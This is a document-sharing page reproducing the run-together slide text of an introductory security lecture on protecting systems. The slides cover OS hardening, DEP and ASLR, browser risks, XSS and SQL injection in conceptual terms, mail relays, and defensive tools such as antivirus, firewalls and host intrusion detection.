Bài giảng Protecting Systems
Host Intrusion Detection Systems (HIDS)
Monitors network traffic
Detects and possibly prevents attempts to
HIDS are software-based and run on a local computer
These systems can be divided into four groups:
File system monitors
Logfile analyzers
Connection analyzers
Kernel analyzers
HIDS compare new behavior against normal behavior
64 trang |
Chia sẻ: vutrong32 | Lượt xem: 1113 | Lượt tải: 0
Bạn đang xem trước 20 trang tài liệu Bài giảng Protecting Systems, để xem tài liệu hoàn chỉnh bạn click vào nút DOWNLOAD ở trên
Protecting SystemsDrive-by DownloadsAt least one in ten web pages are booby-trapped with malwareJust viewing an infected Web page installs malware on your computer, if your operating system and browser are vulnerableObjectivesExplain how to harden operating systemsList ways to prevent attacks through a Web browserDefine SQL injection and explain how to protect against itExplain how to protect systems from communications-based attacksDescribe various software security applicationsHardening the Operating SystemThree StepsUpdates to the operating systemProtecting against buffer overflowsConfiguring operating system protectionsManaging Operating System UpdatesOperating systems are huge and contain many bugs (errors in code)Linux contains 0.17 bug per 1,000 lines of codeTypical commercial software contains 20-30 bugs per 1,000 lines of code81 bugs a day were reported for Windows Vista Beta 2Some of those bugs create vulnerabilitiesManaging Operating System UpdatesManaging Operating System UpdatesUpdate TerminologySecurity patchA general software security update intended to cover vulnerabilities that have been discoveredHotfix addresses a specific customer situationOften may not be distributed outside that customer’s organizationService packA cumulative package of all security updates plus additional featuresUpdate TerminologyPatch Management TechniquesAutomatic Updates Options Patches can sometimes create new problemsAutomated Patch Update ServiceUsed to manage patches locally instead of relying upon the vendor’s online update serviceAdvantagesAdministrators can test patches before deploying themEvery machine is updated simultaneouslyUsers cannot disable or circumvent updatesCan save bandwidth and timeComputers that do not have Internet access can receive updatesBuffer Overflow ProtectionBuffer overflowOccurs when a process attempts to store data in random access memory (RAM) beyond the boundaries of a fixed-length storage bufferExtra data overflows into the adjacent memory locations and under certain conditions may cause the computer to stop functioningAttackers also use a buffer overflow in order to compromise a computerBuffer Overflow ProtectionBuffer Overflow ProtectionBasic defensesWrite “defensive” program code that will protect against these attacksUse a programming language that makes these attacks more difficultFor Windows-based systems, there are two defenses against buffer overflowsData execution prevention (DEP)Address space layout randomization (ASLR)Data Execution Prevention (DEP)Most modern CPUs support an NX (No eXecute) bit to designate a part of memory for containing only dataDEP will not allow code in the memory area to be executedWindows Vista allows software developers to enable NX hardware protection specifically for the application software that they developData Execution Prevention (DEP)In Windows 7 Start, right-click Computer, Properties, Advanced System Settings, Advanced Tab, Performance SettingsAddress Space Layout Randomization (ASLR)Randomly assigns executable operating system code to one of 256 possible locations in memoryThis makes it harder for an attacker to locate and take advantage of any functionality inside these executablesASLR is most effective when it is used in conjunction with DEPHow to See ASLRDownload Process Explorer Show Lower PaneView, Lower Pane View, DLLSView, Select Columns, DLL tab, Base AddressSelect explorer.exe and find ntdll.dllReboot to see base address changeHow to See ASLRConfiguring Operating System ProtectionFour steps:Security policyDefine defense mechanisms company will useConfiguration baselineOperating System settingsSecurity templateA set of settings in a single packageDeploymentManually or through Group PolicyPreventing Attacks That Targetthe Web BrowserAttack TechniquesCookiesJavaScriptJavaActiveXCross-site scripting (XSS)CookiesCookies are computer files that contain user-specific informationTypes of cookiesFirst-party cookieThird-party cookieCookies can pose a privacy riskCookies can be used to track the browsing or buying habits of a userDefenses against cookies include disabling the creation of cookies or deleting them once they are createdJavaScriptJavaScriptDeveloped by NetscapeScripting language that does not create standalone applicationsScripting languageA computer programming language that is typically interpreted into a language the computer can understandVisiting a Web site that automatically downloads a program to run on a local computer can be dangerousJavaScriptJavaScriptSeveral defense mechanisms prevent JavaScript programs from causing serious harm:JavaScript cannot read or write filesJavaScript cannot connect to other machines on your LANOther security concerns remain:JavaScript programs can capture and send user information without the user’s knowledge or authorizationThe defense against JavaScript is to disable it within the Web browserJavaJavaA complete object-oriented programming language created by Sun MicrosystemsCan be used to create standalone applicationsJava appletA separate program stored on a Web server and downloaded onto a user’s computer along with HTML codeCan also be made into hostile programsJavaJavaSandbox is a defense against a hostile Java applet Surrounds program and keeps it away from private data and other resources on a local computerTwo types of Java applets:Unsigned Java applet: program that does not come from a trusted source Signed Java applet: has information proving the program is from a trusted source and has not been alteredJavaActiveXSet of technologies developed by MicrosoftNot a programming language but a set of rules for how applications should share informationActiveX controlsAlso called add-ons or ActiveX applicationsRepresent a specific way of implementing ActiveX Can perform many of the same functions of a Java applet, but do not run in a sandboxHave full access to Windows operating systemActiveX poses a number of security concernsActiveXNearly all ActiveX control security mechanisms are set in Internet ExplorerActiveX controls do not rely exclusively on Internet ExplorerHowever, can be installed and executed independentlyThe defense against ActiveX is to disable it within the Web browserCross Site Scripting (XSS)An attack in which malicious code is inserted into a specific type of dynamic Web pageTypically involves using client-side scripts written in JavaScript or ActiveXDesigned to extract information from the victim and then pass the information to the attackerTargeted to Web sites that dynamically generate Web pages that redisplay (echo) user input that has not been properly validatedCross Site Scripting (XSS)Cross Site Scripting (XSS) attack stepsAn attacker searches for a Web site that redisplays a bad login (See Figures 3-8 and 3-9)The attacker then creates an attack URL that contains the embedded JavaScript commandsA fake e-mail is sent to unsuspecting users with the attack URL as a modified embedded link in the e-mailThe unsuspecting victim clicks on the attack URL and enters his username and passwordCross Site Scripting (XSS)Cross Site Scripting (XSS)Cross Site Scripting (XSS)Defenses against XSS involve both Web masters of legitimate sites as well as usersWebmasters should check that all user input is validated and that attackers do not have the ability to inject codeThey also should be sure that all Web services and database software is patched to prevent XSSUsers should never click on embedded links in e-mailsSQL InjectionOne of the most common types of attacksUses a form of injection like XSSHinges on an attacker being able to enter an SQL database query into a dynamic Web pageSQL (structured query language)A language used to view and manipulate data that is stored in a relational databaseSQL InjectionHackthissite.orgDon't put anything true about you on this site--they are real criminalsSQL InjectionDisplays entire username databaseSQL InjectionSQL InjectionVariations to the SQL injection attackDeleting data from the databaseAccessing the host operating system through function callsRetrieving a list of all usernames and passwordsHardening Web ServersSMTP Open RelaysE-mail systems use two TCP/IP protocols to send and receive messagesSimple Mail Transfer Protocol (SMTP) handles outgoing mailPost Office Protocol (POP3 for the current version) handles incoming mailIMAP (Internet Mail Access Protocol)A more advanced protocol that solves many problems E-mail remains on the e-mail serverMail can be organized into folders and read from any computerCurrent version is IMAP4SMTP Open RelaysSMTP Open RelaysSMTP relaySMTP servers can forward e-mail sent from an e-mail client to a remote domainSMTP open relayIf SMTP relay is not controlled, an attacker can use it to forward thousands of spam e-mail messagesThe defenses against SMTP open relay are to turn off mail relay altogetherSo that all users send and receive e-mail from the local SMTP server only or limit relays to only local usersInstant MessagingInstant messaging (IM)Real-time communication between two or more usersCan also be used to chat between several users simultaneously, to send and receive files, and to receive real-time stock quotes and newsBasic IM has several security vulnerabilitiesIM provides a direct connection to the user’s computer; attackers can use this connection to spread viruses and wormsIM is not encrypted by default so attackers could view the content of messagesInstant MessagingSteps to secure IM include:Keep the IM server within the organization’s firewall and only permit users to send and receive messages with trusted internal workersEnable IM virus scanningBlock all IM file transfersEncrypt messagesPeer-to-Peer (P2P) NetworksPeer-to-peer (P2P) networkUses a direct connection between usersDoes not have servers, so each device simultaneously functions as both a client and a server to all other devices connected to the networkP2P networks are typically used for connecting devices on an ad hoc basisFor file sharing of audio, video, and data, or real-time data transmission such as telephony trafficViruses, worms, Trojan horses, and spyware can be sent using P2PPeer-to-Peer (P2P) NetworksA new type of P2P network has emerged known as BitTorrentTorrents are active Internet connections that download a specific file available through a trackerServer program operated by the person or organization that wants to share the fileWith BitTorrent, files are advertisedBitTorrent downloads are often illegal and contain malwareApplying Software Security ApplicationsAntivirusAnti-spamPopup blockersPersonal software firewallsHost intrusion detection systemsAntivirusAntivirus (AV) softwareScan a computer for infections as well as monitor computer activity and scan all new documents, such as e-mail attachments, that might contain a virusIf a virus is detected, options generally include cleaning the file of the virus, quarantining the infected file, or deleting the fileThe drawback of AV software is that it must be continuously updated to recognize new virusesAV software use definition files or signature filesPopup BlockersPopupA small Web browser window that appears over the Web site that is being viewedPopup blockerAllows the user to limit or block most popupsCan be either a separate program or a feature incorporated within a browserAs a separate program, popup blockers are often part of a package known as antispywareHelps prevent computers from becoming infected by different types of spywarePopup BlockersAnti-SpamTwo different options for installing a corporate spam filterInstall the spam filter with the SMTP serverSee Figure 3-14Install the spam filter with the POP3 serverSee Figure 3-15Anti-SpamAnti-SpamAnti-SpamA third method is to filter spam on the local computerTypically, the e-mail client contains several different features to block spam, such as:Level of junk e-mail protectionBlocked sendersAllowed sendersBlocked top level domain listA final method of spam filtering is to install separate filtering software that works with the e-mail client softwareGmail's Spam FilterVery effectiveFreeAutomatic - effortless to usePersonal Software FirewallsFirewall, sometimes called a packet filterDesigned to prevent malicious packets from entering or leaving computersCan be software-based or hardware-basedPersonal software firewallRuns as a program on a local system to protect it against attacksMany operating systems now come with personal software firewallsOr they can be installed as separate programsHost Intrusion Detection Systems (HIDS)Monitors network trafficDetects and possibly prevents attempts toHIDS are software-based and run on a local computerThese systems can be divided into four groups:File system monitorsLogfile analyzersConnection analyzersKernel analyzersHIDS compare new behavior against normal behavior
Các file đính kèm theo tài liệu này:
- 03_protecting_systems_3319.pptx